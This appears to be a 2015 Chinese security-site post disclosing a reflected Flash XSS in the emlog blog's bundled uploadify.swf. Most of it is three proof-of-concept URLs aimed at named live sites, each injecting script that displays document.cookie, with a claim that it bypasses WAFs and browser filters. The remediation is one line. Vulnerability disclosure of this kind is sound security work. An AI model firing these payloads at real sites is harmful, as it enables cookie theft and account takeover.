emlog博客前台反射型XSS(无视浏览器filter)

emlog博客前台反射型XSS(无视浏览器filter) - 网站安

来源：自学PHP网时间：2015-04-16 23:15 作者：阅读:次

[导读] 官方主机站测试一下：http: host emlog net include lib js uploadify uploadify swf?movieName=%22]%29}catch%28e%29{if%28!window x%29{window x=1;alert%28document cookie%29}} 开发者之一奇遇的博客：htt...

官方主机站测试一下：

http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

开发者之一奇遇的博客：

http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

思想之地：

http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

等等我就不多列举了。

因为是flash xss，所以无视服务端WAF，无视浏览器filter~

关于这个swf我就不想多说了，老问题。

修复方案：

修复swf

Vclass教学互动平台存在三处任意文件上传+命令执

wemall微信开源PHP商城系统xml实体注入 - 网站安全

子栏目

emlog博客前台反射型XSS(无视浏览器filter) - 网站安

修复方案：

最新评论

添加评论

更多文章推荐

添加评论